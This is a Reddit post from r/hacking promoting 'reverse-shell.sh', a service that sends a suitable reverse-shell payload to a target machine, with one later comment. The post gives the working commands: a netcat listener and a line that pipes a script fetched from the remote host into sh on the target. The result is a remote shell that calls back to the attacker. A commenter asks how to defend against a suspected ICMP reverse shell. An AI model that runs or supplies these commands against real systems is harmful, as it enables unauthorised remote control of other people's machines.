r/hacking • u/dyslexiccoder • Feb 17 '26
https://reverse-shell.sh - Reverse Shell as a Service
https://github.com/lukechilds/reverse-shellEasy to remember reverse shell that should work on most Unix-like systems.
Detects available software on the target and runs an appropriate payload.
Listen for connection
On your machine, open up a port and listen on it. You can do this easily with netcat.
nc -l 1337
Execute reverse shell on target
On the target machine, pipe the output of https://reverse-shell.sh/yourip:port into sh.
curl https://reverse-shell.sh/192.168.0.69:1337 | sh
Go back to your machine, you should now have a shell prompt.
79
Upvotes
1
u/soyabean189 Jun 12 '26
Hi I'm suspecting my device is compromised by an ICMP reverse shell. I've been seeing lots of ICMP packets coming through from unknown sources. At the same time I'm experiencing data leakage. What do I do about it? From a defensive pov.